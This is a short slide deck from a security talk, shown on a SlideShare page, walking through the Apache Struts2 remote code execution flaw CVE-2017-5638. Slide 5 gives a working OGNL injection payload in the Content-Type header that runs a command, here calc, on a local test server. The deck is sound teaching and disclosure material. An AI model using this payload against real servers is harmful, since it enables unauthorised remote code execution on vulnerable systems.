O slideshow foi denunciado.
Utilizamos seu perfil e dados de atividades no LinkedIn para personalizar e exibir anúncios mais relevantes. Altere suas preferências de anúncios quando desejar.

Apache Struts2 CVE-2017-5638

514 visualizações

Publicada em

A quick walkthrough and demo of the Apache Struts2 RCE CVE-2017-5638

Publicada em: Tecnologia
  • Entre para ver os comentários

Apache Struts2 CVE-2017-5638

  1. 1. CVE-2017-5638 Apache Struts2 Remote Code Execution
  2. 2. about me • Riyaz Walikar • Chief Hacker @ Appsecco • null Bangalore & OWASP Bangalore chapter leader • @riyazwalikar • @wincmdfu • http://ibreak.software
  3. 3. The vulnerability • Nike Zheng reported a Remote Code Execution vulnerability in Apache Struts2 – CVE-2017-5638 • A bug in Jakarta's Multipart parser used by Apache Struts2 to achieve remote code execution by sending a crafted Content-Type header in the request. • Apache Struts2 is a web framework based on the MVC design paradigm.
  4. 4. GET /struts-app HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://127.0.0.1:8080/ Connection: close Content-Type: multipart/form-data
  5. 5. Content-Type: %{ (#_='multipart/form-data'). (#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('calc')) }
  6. 6. parse method in org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest class
  7. 7. findText > getDefaultMessage > TextParseUtil.translateVariables > evaluate method which will evaluate the OGNL expression in the payload OGNL – Object Graph Navigation Language
  8. 8. demo
  9. 9. Reference: • https://www.immun.io/blog/will-it-pwn-cve-2017-5638-remote- code-execution-in-apache-struts-2

×